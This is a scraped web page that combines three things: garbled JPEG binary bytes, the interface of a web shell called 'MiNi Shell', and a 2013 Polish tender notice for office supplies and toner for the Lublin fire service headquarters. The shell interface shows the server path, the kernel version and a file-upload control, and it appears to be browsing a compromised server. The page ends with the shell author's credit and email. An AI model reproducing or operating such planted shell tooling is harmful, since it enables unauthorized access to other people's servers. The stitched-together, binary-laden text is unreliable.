JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130703/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130703/131929-N-2013.html

<p class="kh_header"><b>Lublin: Dostawa materiałów biurowych oraz akcesoriów do drukowania i kopiowania na potrzeby Komendy Wojewódzkiej Państwowej Straży Pożarnej 
w Lublinie, (nr sprawy WL.2370.13.13)</b><br>
<b>Numer ogłoszenia: 131929 - 2013; data zamieszczenia: 03.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Państwowej Straży Pożarnej w Lublinie , ul. Strażacka 7, 20-012 Lublin, woj. lubelskie, tel. 081 5351240.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kwpsp-lublin.netbip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych oraz akcesoriów do drukowania i kopiowania na potrzeby Komendy Wojewódzkiej Państwowej Straży Pożarnej 
w Lublinie, (nr sprawy WL.2370.13.13).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa materiałów biurowych oraz akcesoriów do drukowania i kopiowania na potrzeby Komendy Wojewódzkiej Państwowej Straży Pożarnej w Lublinie, w tym m.in.: segregatorów, artykułów archiwizacyjnych, akcesoriów do bindowania, zeszytów i bloków biurowych, artykułów piśmienniczych,  papieru do drukowania i kopiowania oraz tonerów, tuszy i bębnów światłoczułych do drukarek i urządzeń kopiujących należących do Zamawiającego. Szczegółowy wykaz materiałów składających się na przedmiot zamówienia zawiera formularz cenowy - Załącznik Nr 1 do SIWZ. Dostawy odbywać się będą w sposób sukcesywny, zgodnie 
z umową, której wzór stanowi Załącznik Nr 8 do SIWZ. 

1.	Materiały biurowe, z zastrzeżeniem pkt 2 muszą być: fabrycznie nowe, wolne od wad technicznych, kompletne.

Zamawiający dopuszcza oferowanie przez Wykonawców materiałów biurowych 
o parametrach równoważnych w stosunku do wskazanych w formularzu cenowym. Materiałem równoważnym jest artykuł lub przedmiot, który jakościowo posiada takie same lub lepsze parametry jak odpowiadający mu materiał wskazany w Załączniku Nr 1 do SIWZ. 
W formularzu cenowym, w rubryce ,Nazwa oferowanego materiału, należy wskazać producenta oferowanego materiału oraz oznaczenie produktu.

2. Papier do drukowania i kopiowania powinien odpowiadać parametrom wskazanym 
w Załączniku nr 1 do SIWZ.
W formularzu cenowym, w rubryce ,Nazwa oferowanego materiału, należy wskazać producenta oferowanego materiału.

3.Tonery, tusze i inne akcesoria do drukowania i kopiowania powinny spełniać następujące wymagania:
1)	powinny być oryginalne producenta danego urządzenia,
2)	powinny być fabrycznie nowe, nieregenerowane, nierefabrykowane, niepoddane procesowi ponownego napełniania i wymiany jakichkolwiek elementów,
3)	za fabrycznie nowy nie uznaje się wyrobu, w którym pojemnik został wyczyszczony i ponownie napełniony tonerem lub tuszem, niezależnie od stosowanej technologii lub procesu ponownego napełniania lub wykorzystania,
4)	powinny być wolne od wad technicznych i kompletne,
5)	powinny posiadać zgodne z właściwymi przepisami atesty,
6)	powinny znajdować się w opakowaniach stosowanych typowo dla danego produktu przez producenta, zaopatrzonych w etykietę identyfikującą dany produkt i termin jej ważności,
7)	termin ważności dostarczonych materiałów eksploatacyjnych nie może być krótszy niż 12 miesięcy.

Zamawiający dopuszcza oferowanie przez Wykonawców tonerów, tuszy i innych akcesoriów do drukowania (kopiowania) o parametrach równoważnych 
w stosunku do wymagań określonych powyżej. 

Przez wyrób równoważny Zamawiający rozumie produkt kompatybilny ze sprzętem, do którego jest zamówiony, o co najmniej takich samych parametrach, tj. pojemność tonera, wydajność i jakość wydruku w stosunku do typu zamawianego produktu fabrycznie nowego, pochodzącego od producenta urządzenia, do którego dany materiał jest przeznaczony.
Oferty zawierające akcesoria zamienne w stosunku do oryginalnych materiałów do drukowania (kopiowania), które  nie spełniają któregokolwiek z parametru równoważności (pojemność tonera, wydajność i jakość wydruku) zostaną odrzucone jako niezgodne z treścią SIWZ na podstawie art. 89 ust. 1 pkt 2 ustawy Prawo zamówień publicznych.  
Wyrób równoważny nie może być materiałem regenerowanym lub refabrykowanym, poddanym procesowi ponownego napełniania, wymiany jakichkolwiek elementów. Wyrób równoważny nie może być również wyrobem, w którym pojemnik na środek drukujący został wyczyszczony i ponownie napełniony tonerem lub tuszem, niezależnie od stosowanej technologii lub procesu ponownego napełniania lub wykorzystania. Oferty zawierające takie materiały zostaną odrzucone jako niezgodne z treścią SIWZ (art. 89 ust. 1 pkt 2 ustawy Prawo zamówień publicznych)
Wykonawca może zaproponować taki produkt równoważny, który będzie spełniać wszystkie wymagane parametry, normy i standardy jakościowe, co produkt oryginalny (pojemność, wydajność, jakość wydruku) lub lepsze.
Zaproponowany przez Wykonawcę produkt równoważny nie może naruszać warunków gwarancji użytkowanego sprzętu. Wykonawca bierze na siebie pełną odpowiedzialność za uszkodzenie sprzętu spowodowane używaniem zaoferowanych materiałów. W szczególności Wykonawca zobowiązany jest do zwrotu kosztów naprawy urządzenia, a w przypadku takiej konieczności - zleconej przez Zamawiającego ekspertyzy rzeczoznawcy. 

W formularzu cenowym (Załącznik nr 1 do SIWZ), w rubryce ,Nazwa oferowanego materiału,  należy wskazać producenta, nazwę, oznaczenie produktu, a także linię (serię), z której pochodzi, np. toner Lambda L-HEN 906, Action Active Jet AT-06N (Premium, Standard, Supreme), Black Point LBPPH06A.
W przypadku, gdy dany producent posiada w swojej ofercie materiały regenerowane (refabrykowane) i nieregenerowane posługując się przy tym odpowiednimi oznaczeniami (nazwą linii lub serii lub odpowiednimi oznaczeniami liczbowymi itp.), 
w formularzu cenowym należy podać to oznaczenie w sposób umożliwiający potwierdzenie, że dany wyrób jest nieregenerowany (nierefabrykowany).
 
4. Uwaga: Podane w ogłoszeniu o przetargu i w SIWZ firmy lub inne oznaczenia producentów albo jakiekolwiek znaki towarowe lub handlowe mają jedynie charakter informacyjny, służący identyfikacji danego artykułu i poprawnemu przygotowaniu oferty.

5. Gwarancja na wszystkie elementy przedmiotu zamówienia - minimum 12 miesięcy od dnia dostawy danego materiału do siedziby Zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.30-1, 30.19.95.00-5, 22.83.00.00-7, 30.19.26.00-7, 30.19.92.00-2, 22.00.00.00-0, 30.19.70.00-6, 30.19.72.00-8, 30.19.21.21-5, 30.19.21.60-0, 30.19.28.00-9, 22.81.63.00-6, 22.99.31.00-8, 30.19.37.00-5, 22.60.00.00-6, 30.19.23.20-0, 30.23.43.00-1, 30.19.21.25-3, 30.14.51.00-8, 33.76.30.00-6, 30.19.97.92-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykazanie w ciągu ostatnich trzech lat realizacji minimum 1 dostawy materiałów biurowych i akcesoriów do drukowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie na kwotę minimum 50 000 PLN brutto lub jej równowartość wyrażoną w innej walucie wg kursu Narodowego Banku Polskiego w dniu sporządzenia oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie wymaganych uprawnień przez osoby, które będą uczestniczyć 
w wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę co najmniej 50 000 PLN lub jej równowartość wyrażoną w innej walucie wg kursu Narodowego Banku Polskiego w dniu sporządzenia oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Oświadczenie dotyczące parametrów i jakości oferowanych akcesoriów do drukowania - Załącznik nr 8 do SIWZ
- Oświadczenie dotyczące zobowiązań gwarancyjnych, pokrycia kosztów naprawy lub wymiany uszkodzonego sprzętu oraz kosztów ekspertyzy technicznej - Załącznik Nr 9 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kwpsp-lublin.netbip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Państwowej Straży Pożarnej w Lublinie
ul. Strażacka 7
20-012 Lublin
p. 309.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.07.2013 godzina 09:00, miejsce: Komenda Wojewódzka Państwowej Straży Pożarnej w Lublinie
ul. Strażacka 7
20-012 Lublin
Sekretariat (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com